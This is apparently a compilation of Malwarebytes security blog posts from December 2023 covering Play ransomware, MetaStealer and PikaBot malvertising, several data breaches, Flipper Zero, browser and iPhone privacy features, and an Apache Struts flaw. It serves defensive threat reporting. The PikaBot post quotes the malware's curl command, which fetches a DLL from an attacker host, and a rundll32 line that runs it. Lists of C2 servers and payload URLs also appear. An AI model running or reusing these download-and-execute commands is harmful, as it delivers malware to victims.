The FBI, CSA, and ACSC have released a joint cybersecurity advisory about the Play ransomware group and their MO.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) have released a joint Cybersecurity Advisory (CSA) about Play ransomware.

According to the FBI, Play made around 300 victims between June 2022 and October 2023 among a wide range of businesses and critical infrastructure in North America, South America, and Europe.

The joint advisory provides a list of legitimate tools that the Play ransomware group uses for their operations, but more importantly, it includes a list of frequently used attack vectors and vulnerabilities. These include the abuse of valid accounts and exploitation of public-facing applications, specifically through known vulnerabilities like ProxyNotShell.

Once inside a network, Play uses specialized tools to try and disable anti-virus software and remove log files. Then the hunt for valuable data and the preparation for the encryption process begins. Typically, that behavior that requires a dedicated security team or an external managed detection and response (MDR) service to discover.

In our most recent monthly ransomware review you’ll see Play climbing from 6th place to 3rd in the list of groups with the highest number of known attacks.

Known ransomware attacks by gang, November 2023

The Play ransomware group has been making a name for itself since August 2022 and is a typical double extortion group. This means they steal data as well as encrypting systems and then threaten to publish the stolen data on their Dark Web leak site.

Screenshot of the PLAY leak site

The joint CSA emphasizes the importance of having an actionable recovery plan, using multi-factor authentication (MFA), and keeping all operating systems, software, and firmware up to date.

The FBI lets readers know it is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Play ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like ThreatDown EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 FBI issues advisory over Play ransomware 

In recent malvertising campaigns, threat actors dropped the MetaStealer information stealer, more or less coinciding with a new version release.

MetaStealer is a popular piece of malware that came out in 2022, levering previous code base from RedLine. Stealers have become a very hot commodity in the criminal space, so much so that there is competition between various groups.

Threat actors have primarily used malspam as an infection vector to drop MetaStealer as well as cracked software via stolen YouTube accounts, but it was at least once previously seen in a malvertising campaign.

In the past week, we observed some malicious ads that weren’t dropping FakeBat or PikaBot, but rather a different payload that we recognized as MetaStealer. Interestingly, in early December, the malware authors behind MetaStealer gave an interview and announced that they were about to release a new and improved version of their tool.

**Distribution**

We captured two different ads for Notepad++ and AnyDesk via Google searches:

According to the Google Ads Transparency Center, one of the campaigns ran in November and December, during specific dates:

Two domains have been setup as both decoy and landing pages. If you were to browse to those sites directly, you would see content that looks like it was generated automatically. Note how the two pages have a similar template.

However, users that clicked on the ads and met the selection criteria will get a malicious landing page and a download link:

**Payload**

The November payload contained a shortcut launching PowerShell that used a hardcoded path to the Downloads folder (would fail if the file was extracted in another directory):

The December campaign got rid of the PowerShell and the malicious DLL was recompiled:

Based on network traffic activity alone, it appears that both payloads are still the MetaStealer from the 3.x branch:

For an in-depth look at MetaStealer, check out this article by Russian Panda.

**Conclusion**

The developers of MetaStealer are improving their product and we are likely to see more of their customers distributing it. Stealers can serve multiple purposes but tend to revolve around items that criminals can easily monetize. Crypto wallets are usually quite coveted, but so are credentials for various online services. And finally, stealers can also be used by initial access brokers, paving the path for ransomware actors.

We have reported the malicious ads to Google and have already blocked the infrastructure behind these campaigns.

ThreatDown, powered by Malwarebytes, detects this threat as _Trojan.MetaStealer.Generic_. The Endpoint Detection and Response (EDR) can also see the process activity tied to this attack:

Additionally, the newly released Incident Timeline feature can alert you of an active intrusion attempt which our Managed Detection and Response team can assist you with.

**Indicators of Compromise**

Malicious domains

rawnotepad\[.\]com  
startworkremotely\[.\]com

Payload URLs

rawnotepad\[.\]com/notepad++.zip  
startworkremotely\[.\]com/Anydesk.zip

Payload hashes

949c5ae4827a3b642132faf73275fb01c26e9dce151d6c5467d3014f208f77ca  
99123063690e244f95b89d96759ec7dbc28d4079a56817f3152834047ab047eb  
c5597da40dee419696ef2b32cb937a11fcad40f4f79f9a80f6e326a94e81a90f

MetaStealer C2s

wgcuwcgociewewoo\[.\]xyz  
ockimqekmwecocug\[.\]xyz  
kiqewcsyeyaeusag\[.\]xyz  
cewgwsyookogmmki\[.\]xyz  
startworkremotely\[.\]com  
csyeywqwyikqaiim\[.\]xyz  
iqaeaoeueeqouweo\[.\]xyz  
mmswgeewswyyywqk\[.\]xyz  
accounts\[.\]google\[.\]com  
iqwgwsigmigiqgoa\[.\]xyz

 New MetaStealer malvertising campaigns 

Loan and mortgage giant Mr. Cooper reported a data breach in which the personal data of 14.7 million homeowners were stolen.

A major mortgage and loan company based in Dallas, working under the name Mr. Cooper Group Inc. has released more information on a recent breach. In a data breach notification, the company didn’t say what type of cyberattack caused the compromise of customer data, calling it a rather non-descriptive “External system breach (hacking).”

For those unfamiliar with the name, Mr. Cooper is a rebranding of Nationstar Mortgage, and reportedly some 14.7 million homeowners may be affected by the data breach.

A month ago, in November 2023, the company stated that the number of affected customers was limited to around 4 million, because banking information related to mortgage payments is hosted with a third-party provider, whose systems were believed not to be compromised.

As it turns out, all current and former customers, amounting to over 14 million people had their personal data stolen. Mr. Cooper shut down multiple systems after it discovered the cyberattack on October 31, 2023 and started its investigation.

The data accessible during the attack included the names, addresses, phone numbers, Social Security numbers, dates of birth, and bank account numbers of Mr. Cooper’s customers.

One the page dedicated to the incident, Mr. Cooper states:

> “To help support our customers, we are offering two years of free credit monitoring and identity protection services through TransUnion to any former or current (as of Oct. 31, 2023) Mr. Cooper customer or customers whose loans we service on behalf of our servicing partners. We will be directly notifying customers and providing them with enrollment instructions for the free identity protection services.”

Mr. Cooper says it is actively monitoring the dark web without any evidence that the data related to this incident has been further shared, published, or otherwise misused. This may however change if it turns out that any ransomware demands are made and not met. At some points the data thieves may want to cash in for the stolen data.

**Data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   Enable two-factor authentication. Where possible, use a FIDO2 2FA device. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   Consider investing in an identity monitoring solution which will alert you if your personal information is found being illegally traded online, as well as help you recover.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using Malwarebytes Identity Theft Protection.

 Mr. Cooper leaks personal data of 14 million loan and mortgage customers 

This week on the Lock and Code podcast, we speak with EFF public interest technology Cooper Quintin about the hacking tool, the Flipper Zero.

_This week on the Lock and Code podcast…_

It talks, it squawks, it even blocks! The stocking-stuffer on every hobby hacker’s wish list this year is the Flipper Zero.

“Talk” across low-frequency radio to surreptitiously change TV channels, emulate garage door openers, or even pop open your friend’s Tesla charging port without their knowing! “Squawk” with the Flipper Zero’s mascot and user-interface tour guide, a “cyber-dolphin” who can “read” the minds of office key fobs and insecure hotel entry cards. And, introducing in 2023, block iPhones running iOS 17!

No, really, for a couple of months near the end of 2023, this consumer-friendly device could crash iPhones (a vulnerability that Apple fixed in a software update in mid-December), and in the United States, it is entirely legal to own.

But for security researcher Jeroen van der Ham, the Flipper Zero also served as a real pain in the butt one day in October, when, aboard a train in the Netherlands, he got a popup on his iPhone about a supposed Bluetooth pairing request with a nearby Apple TV. Strange as that may be on a train, van der Ham soon got another request. And then another, and another, and another.

In explaining the problem to the outlet Ars Technica, van der Ham wrote:

> “My phone was getting these popups every few minutes and then my phone would reboot. I tried putting it in lock down mode, but it didn’t help.”

Later that same day, on his way back home, once again aboard the train, van der Ham noticed something odd: the iPhone popups came back, and this time, he noticed that his fellow passengers were also getting hit.

What van der Ham soon learned is that he—and the other passengers on the train—were being subjected to a Denial-of-Service attack, which weaponized the way that iPhones receive Bluetooth pairing requests. A Denial-of-Service attack is simple. Essentially, a hacker, or more commonly, an army of bots, will flood a device or a website with requests. The target in these attacks cannot keep up with the requests, so it often locks up and becomes inaccessible. That can be a major issue for a company that is suffering from having its website attacked, but it’s also dangerous for everyday people who may need to use their phones to, say, document something important, or reach out to someone when in need.

In van der Ham’s case, the Denial-of-Service attack was likely coming from one passenger on the train, who was aided by the small, handheld device, the Flipper Zero.

Today, on the Lock and Code podcast, with host David Ruiz, we speak with Cooper Quintin, senior public interest technologist with Electronic Frontier Foundation—and Flipper Zero owner—about what the Flipper Zero can do, what it can’t do, and whether governments should get involved in the regulation of the device (that’s a hard “No,” Quintin said).

“Governments should be welcoming this device,” Quintin said. “Every government right now is saying, ‘We need more cyber security capacity. We need more cyber security researchers. We got cyber wars to fight, blah, blah, blah,’ right?”

Quintin continued:

> “Then, when you make this amazing tool that is, I think, a really great way for people to start interacting with cybersecurity and getting really interested in it—then you ban that?”

Tune in today to listen to the full conversation.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Meet the entirely legal, iPhone-crashing device, the Flipper Zero: Lock and Code S04E25 

MongoDB has warned customers about a data breach that leaked information about their customers. The incident is under investigation.

Database provider MongoDB has posted a security notice about a security incident in which attackers obtained unauthorized access to some of its corporate systems. The targeted system contained customer names, phone numbers, and email addresses among other customer account metadata, including system logs for one customer.

That customer has been notified separately and there is no evidence that any other customers’ system logs were accessed. MongoDB said there is no evidence of unauthorized access to Atlas clusters since that would require compromise of the separate Atlas cluster authentication system.

On Wednesday December 13, 2023, MongoDB’s staff detected suspicious activity and began an investigation. The investigation is ongoing, but it appears that the unauthorized access was going on for “some period of time” before discovery.

In emails sent to MongoDB customers, MongoDB advises users to be alert about phishing and social engineering attacks that might use the leaked customer metadata to gain credibility.

Scammers often try to take advantage of data breaches. They know that the breached company is likely to be contacting victims, and that the victims will be looking out for emails from the company. It’s easy to spoof an email to make it look like it comes from somewhere else, and then send someone malware or a link to a phishing site.

Users are also advised to rotate database passwords and enable multi-factor authentication (MFA).

If you suspect you might be affected by this data breach, you may want to keep an eye on the alert page with additional information as MongoDB continues to investigate the matter. And if there is anything important, we will update this article.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 MongoDB warns customers about data breach after cyberattack 

A list of topics we covered in the week of December 11 to December 17 of 2023

December 15, 2023 - PikaBot, a stealthy malware normally distributed via malspam is now being spread via malicious ads.

December 15, 2023 - Google will soon roll out its Tracking Protection feature to some randomly chosen users in order to prepare for a full deployment.

December 14, 2023 - Apple has plans to make it harder for iPhone thieves to steal your personal information even if they have your device’s passcode.

December 14, 2023 - A recently patched Apache Struts 2 vulnerability has been spotted in worldwide exploitation attempts. Users and admins should update ASAP.

December 14, 2023 - The ALPHV ransomware group appears to be going through some things.

 A week in security (December 11 &#8211; December 17) 

PikaBot, a stealthy malware normally distributed via malspam is now being spread via malicious ads.

During this past year, we have seen an increase in the use of malicious ads (malvertising) and specifically those via search engines, to drop malware targeting businesses. In fact, browser-based attacks overall have been a lot more common if we include social engineering campaigns.

Criminals have found success in acquiring new victims thanks to search ads; we believe there are specialized services that help malware distributors and affiliates to bypass Google’s security measures and helping them to set up a decoy infrastructure. In particular, we saw similarities with the malvertising chains previously used to drop FakeBat.

In the past few days, researchers including ourselves have observed PikaBot, a new malware family that appeared in early 2003, distributed via malvertising. PikaBot was previously only distributed via malspam campaigns similarly to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577.

In this blog post, we share details about this new campaign along with indicators of compromise.

**PikaBot via malspam**

PikaBot was first identified as a possible Matanbuchus drop from a malspam campaign by Unit 42 in February 2023. The name PikaBot was later given and attributed to TA577, a threat actor that Proofpoint saw involved in the distribution of payloads such as QakBot, IcedID, SystemBC as well as Cobalt Strike. More importantly, TA577 has been associated with ransomware distribution.

Researchers at Cofense observed a rise in malspam campaigns to deliver both DarkGate and PikaBot, following the takedown of the QakBot botnet in August 2023. A typical distribution chain for PikaBot usually starts with an email (hijacked thread) containing a link to an external website. Users are tricked to download a zip archive containing a malicious JavaScript.

The JavaScript creates a random directory structure where it retrieves the malicious payload from an external website via the _curl_ utility:

"C:\\Windows\\System32\\cmd.exe" /c mkdir C:\\Gkooegsglitrg\\Dkrogirbksri & curl https://keebling\[.\]com/Y0j85XT/0.03471530983348692.dat --output C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll

curl https://keebling\[.\]com/Y0j85XT/0.03471530983348692.dat --output C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll

It then executes the paylod (DLL) via _rundll32_:

rundll32 C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll,Enter

As described by OALabs, PikaBot’s core module is then injected into the legitimate _SearchProtocolHost.exe_ process. PikaBot’s loader also hides its injection by using indirect syscalls, making the malware very stealthy.

**Distribution via malvertising**

The campaign targets Google searches for the remote application AnyDesk. Security researcher Colin Cowie observed the distribution chain and the payload was later confirmed to be PikaBot by Ole Villadsen.

We also saw this campaign via a different ad impersonating the AnyDesk brand, belonging to the fake persona “Manca Marina”:

A decoy website has been setup at _anadesky\[.\]ovmv\[.\]net_:

The download is a digitally signed MSI installer. It’s worth noting that it had zero detection on VirusTotal at the time we collected it. However, the more interesting aspect is how it evades detection upon execution.

The diagram below from JoeSandbox summarizes the execution flow:

**Malvertising similarities with FakeBat**

The threat actors are bypassing Google’s security checks with a tracking URL via a legitimate marketing platform to redirect to their custom domain behind Cloudflare. At this point, only clean IP addresses are forwarded to the next step.

They perform fingerprinting via JavaScript to determine, among other things, if the user is running a virtual machine. Only after the check is successful do we see a redirect to the main landing page (decoy AnyDesk site).

What’s interesting is that there is a second fingerprinting attempt when the user clicks the download button. This is likely to ensure that the download link won’t work in a virtualized environment. In this particular campaign, the threat actor is hosting the MSI installer on Dropbox.

We noticed that previous malvertising chains used the same redirection mechanism via onelink\[.\]me as well as URL structure. These incidents were previously reported to Google and targeted Zoom and Slack search ads:

In some of these instances, we had identified the payload as FakeBat. This is particularly interesting because it points towards a common process used by different threat actors. Perhaps, this is something akin to “malvertising as a service” where Google ads and decoy pages are provided to malware distributors.

**Conclusion**

Several years ago, exploit kits were the primary malware distribution vector via drive-by downloads. As vulnerabilities in the browser and its plugins began to be less effective, threat actors concentrated on spam to target businesses. However, some did continue to target browsers but instead had to rely on social engineering, luring victims with fake browser updates.

With malvertising, we see another powerful delivery vector that does not require the user to visit a compromised site. Instead, threat actors are piggybacking on search engines and simply buyings ads that they know their target will be exposed to. As we may have said before, businesses can prevent this risk by only allowing their end users to install applications via their own trusted repositories.

Malwarebytes detects the malicious MSI installers as well as the web infrastructure used in these malvertising campaigns. We have reported the malicious ads and download URLs to Google and Dropbox respectively.

_Special thanks to Sergei Frankoff, Ole Villadsen, and pr0xylife for their help and feedback._

**Indicators of Compromise**

**Malicious domains**

anadesky\[.\]ovmv\[.\]net
cxtensones\[.\]top

**Dropbox payloads**

dropbox\[.\]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1&rlkey=wpbj6u5u6tja92y1t157z4cpq  
dropbox\[.\]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1&rlkey=h07ehkq617rxphb3asmd91xtu  
dropbox\[.\]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1&rlkey=qbtes3fd3v3vtlzuz8ql9t3qj

**PikaBot hashes**

0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5  
da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff  
69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320

**PikaBot C2s**

172\[.\]232\[.\]186\[.\]251  
57\[.\]128\[.\]83\[.\]129  
57\[.\]128\[.\]164\[.\]11  
57\[.\]128\[.\]108\[.\]132  
139\[.\]99\[.\]222\[.\]29  
172\[.\]232\[.\]164\[.\]77  
54\[.\]37\[.\]79\[.\]82  
172\[.\]232\[.\]162\[.\]198  
57\[.\]128\[.\]109\[.\]221

 PikaBot distributed via malicious search ads 

Google will soon roll out its Tracking Protection feature to some randomly chosen users in order to prepare for a full deployment.

Google has announced that it will start rolling its Chrome web browser’s new Tracking Protection feature from January of 2024. Tracking Protection is part of Google’s Privacy Sandbox initiative to phase out third-party cookies. The Tracking Protection feature aims to disable third-party cookies completely in the second half of 2024.

Third-party cookies, often referred to as non-essential cookies, can be used to track visitors as they move from one website to another, with the purpose of creating profiles for personalized ads. But other website features, like authentication and fraud prevention can also depend on them.  

Starting January 4, Google says it will select one percent of Chrome users on desktop and Android at random, and that group will get the option to use the Tracking Protection feature. The chosen users will receive a notification about it when they open Chrome.

The selected Chrome users can do some testing to establish the impact of blocking third-party cookies on their browsing experience. For example, when Tracking Protection is enabled, some websites may not load correctly, so users will also have the option to temporarily re-enable third-party cookies for that specific website.

One significant difference with the existing (largely useless) “Do Not Track” feature is that websites do not have a choice about whether to cooperate with Tracking Protection. Do Not Track is a signal sent by the browser that asks websites to play nicely and not track it. It isn’t effective and there is no way to determine if it’s having the desired effect or not.

Other initiatives by Google in this direction include hiding your IP address. An IP address is the next best thing for tracking users across the internet. Although the IP address is often not limited to one system, they are very often bound to one household. Google’s IP Protection proposal wants to use proxies to hide users’ IP addresses.

It remains to be seen how fruitful these initiatives will be. A few years ago (March 2021), Google ran some tests with a program called Federated Learning of Cohorts (FLoC) which was also intended to replace third-party cookies. But the technology was criticized on privacy grounds and on January 25, 2022, Google officially announced it had ended development of FLoC technologies.

FLoC was replaced by the Topics API, another Privacy Sandbox mechanism designed to preserve privacy while allowing a browser to share information with third parties about a user’s interests.

Meanwhile, regulators are monitoring the tech giant’s initiatives to ensure they don’t give the company an unfair advantage in selling its own ads.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Chrome starts the countdown to the end of tracking cookies 

Apple has plans to make it harder for iPhone thieves to steal your personal information even if they have your device’s passcode.

Reportedly, Apple has plans to make it harder for iPhone thieves to steal your personal information even if they have your device’s passcode.

A new feature called Stolen Device Protection is included in the bet version of iOS 17.3. The feature limits access to your private information in case someone gets hold of both your iPhone and your passcode.

Thieves sometimes lurk in public places like bars on the lookout for iPhone owners typing in their passcode. Once they know the passcode, they steal the device and gain access.

With the passcode, a thief can perform a lot of actions that have financial consequences and some that make it harder to retrieve the device:

*   View and use passwords or passkeys saved in the iCloud Keychain
*   Apply for a new Apple Card
*   Turn off Lost Mode
*   Erase all content and settings
*   Take certain Apple Cash and Savings actions in Wallet
*   Use payment methods saved in Safari
*   Use your iPhone to set up a new device
*   Change your Apple ID password
*   Update select Apple ID account security settings, including adding or removing a trusted device, trusted phone number, Recovery Key, or Recovery Contact
*   Change your iPhone passcode
*   Add or remove Face ID or Touch ID
*   Turn off “Find My”

However, when users turn on Stolen Device Protection, Face ID or Touch ID authentication is required for all of the above actions and also to turn off Stolen Device Protection.

Apple said it will share additional information about Stolen Device Protection soon, to clarify how the feature works.

**We don’t just report on iOS security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your iOS devices by downloading Malwarebytes for iOS today.

 Apple to introduce new feature that makes life harder for iPhone thieves 

A recently patched Apache Struts 2 vulnerability has been spotted in worldwide exploitation attempts. Users and admins should update ASAP.

Attackers are exploiting a critical vulnerability in Apache Struts 2 that was patched recently. Struts is a very popular open source platform to develop applications and websites.

On December 7, 2023, Apache announced versions 6.3.0.2 and 2.5.33 of Struts were now available to address a potential security vulnerability listed as CVE-2023-50164.

The vulnerability affects Apache Struts versions:

*   2.0.0 through 2.5.32
*   6.0.0 through 6.3.0.1
*   2.0.0 through 2.3.37 (EOL, no longer supported)

The vulnerability that has a CVSS score of 9.8 out of 10, lies in the frameworks’ file upload functionality and can be exploited to achieve remote code execution (RCE). There is an easy to follow proof-of-concept (PoC) available, which makes it easier for cybercriminals to exploit the vulnerability.

Basically it’s a path traversal flaw that allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like ../ into file or directory paths. The flaw is caused by parameter confusion, where an attacker can first capitalize a parameter in the request and then submit an additional parameter (in lowercase) that overrides an internal file name variable. That allows an attacker to bypass the built-in check and leave the path traversal payload in the final filename.

This allows a successful attacker to plant a web shell, a malicious script used by an attacker that allows them to escalate and maintain persistent access. In this case, the attacker gets the ability to write a server-side rendered file, such as a JSP (Jakarta Server Pages) file, into a target directory. The JSP payload is executed as soon as the attacker requests the file from the server and the server is compromised. Several international organizations like the Australian Cyber Security Centre (ACSC), the French Computer Emergency Response Team (CERT-FR), and content delivery giant Akamai are warning that they are seeing active exploitation.

_Tweet by Akamai_

Because of the relative ease-of-use, we can expect to see a lot more of these attacks.

**Update now**

Users and administrators are encouraged to review the Apache Security Bulletin and upgrade to Struts 2.5.33 or Struts 6.3.0.2 or greater. There are no workarounds.

According to Apache this is a drop-in replacement and upgrade should be straightforward. The new versions can be found on the Struts download page.

Besides updating, additional measures may include:

*   Sanitization checks on uploaded file data.
*   Limit server application permissions to allowed directories.
*   Track which applications in use within your environments are using Struts frameworks.
*   On internet facing Java systems monitor for newly created files outside directories where they are expected.
*   Continue to monitor the situation and respond to new information as it comes to light.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

Source

Malwarebytes